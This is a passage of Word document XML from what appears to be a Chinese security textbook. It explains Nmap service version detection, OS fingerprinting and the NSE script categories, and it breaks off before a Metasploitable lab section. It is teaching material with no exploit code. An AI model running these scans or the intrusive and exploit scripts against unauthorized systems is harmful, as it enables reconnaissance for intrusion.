        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈的细微行为差异，属于①原理；但推断准确度受防火墙干扰、NAT、负载均衡等因素影响，且指纹数据库不断更新，因此具体识别结果属于②环境/版本依赖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap Scripting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Engine（NSE）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的强大扩展框架，允许用户编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本，在扫描过程中自动化执行各种高级任务，例如漏洞检测、利用验证、认证爆破、信息收集等。脚本按照侵入性和功能划分为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（默认安全且较快）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">intrusive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（可能产生大量日志或副作用）等多个类别。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，攻击者可以高效地批量获取目标弱点；防御者同样可以利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行安全审计，提前发现自身问题。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="97" w:name="服务版本指纹service-version-detection-sv"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务版本指纹（Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项启用版本扫描。与端口扫描不同，版本扫描会在端口确认开放后，主动建立连接（或复用已有连接）并发送特定探针，然后分析响应的应用层数据。默认会使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库猜测端口对应的可能服务，如果猜测失败，还会尝试基于通用协议的探针（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，或只是等待</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">banner）。其工作流程可以概括为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测列表：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护了一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-service-probes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，其中定义了针对不同服务的探测数据包以及匹配模式（正则表达式）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送探针：对每个开放端口，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选择优先级匹配的探针并发送，可能在同一个连接中发送多个探针。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应匹配：收到的每一行响应都会与探针的匹配规则进行模式匹配，按匹配质量排序，选择一个最佳匹配输出服务名和版本。若没有明显匹配，可能会尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSL/TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">封装检测、HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本扫描提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--version-intensity &lt;0-9&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数控制探测强度。强度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅尝试最有可能的探针，速度快但可能遗漏；强度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会使用所有探针，慢但更可能识别不常见的服务。默认强度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在速度和准确性之间取得平衡。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：版本扫描结果完全依赖实际运行的服务软件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝不编造具体版本号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；下面的示例输出用占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SERVICE_NAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VERSION&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代表可能的发现，实际数值因靶机而异②。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="98" w:name="操作系统指纹os-fingerprint-o"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统指纹（OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Fingerprint）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项启动操作系统检测。若配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等扫描使用，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先会在目标上发现至少一个开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口和一个关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，以及至少一个开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口和关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，以具备足够多的协议栈交互样本。然后系统指纹分为两个阶段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一阶段（序列生成测试）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向目标发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测包，每个包使用不同的标志位（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN、ACK、URG+PSH+FIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），用来测量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ISN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的可预测性、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的生成方式、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间戳回复的规律等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第二阶段（协议特定测试）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：发送多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/UDP/ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包，测试目标的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项布局、窗口大小、对非法标志组合的响应、ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误消息的类型和引用内容、对分片包的响应等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">收集到的所有特征值组成一个指纹字符串，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">再将其与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-os-db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的参考指纹进行匹配，给出最可能的操作系统系列、生成类型以及细节。由于操作系统厂商可能修改内核参数、使用定制协议栈或中间防火墙进行规范化，指纹结果可能存在偏差，需要考虑“指纹置信度百分比”（①原理；②具体输出）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:id="99" w:name="nse-脚本引擎nmap-scripting-engine"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本引擎（Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Scripting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Engine）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编写，位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;nmap_install_dir&gt;/scripts/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下。脚本按类别组织，常用类别包括：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：不会影响目标稳定性，用于常规信息收集。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：等同于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，包含一组常用且低风险的脚本。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">intrusive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可能产生大量日志或引起服务崩溃，例如暴力破解、拒绝服务测试。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检测已知漏洞。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：尝试利用漏洞（非常危险，通常需明确授权）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：处理认证绕过或枚举。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：网络和服务发现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行脚本时可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script &lt;script-name|category|wildcard&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script http-title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只运行脚本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http-title.nse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vuln </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类别下所有脚本；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script "http-*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行所有名称以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“http-”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开头的脚本。可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script-args</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向脚本传递参数。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="靶机实操单元本书生命线-扫描-metasploitable"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
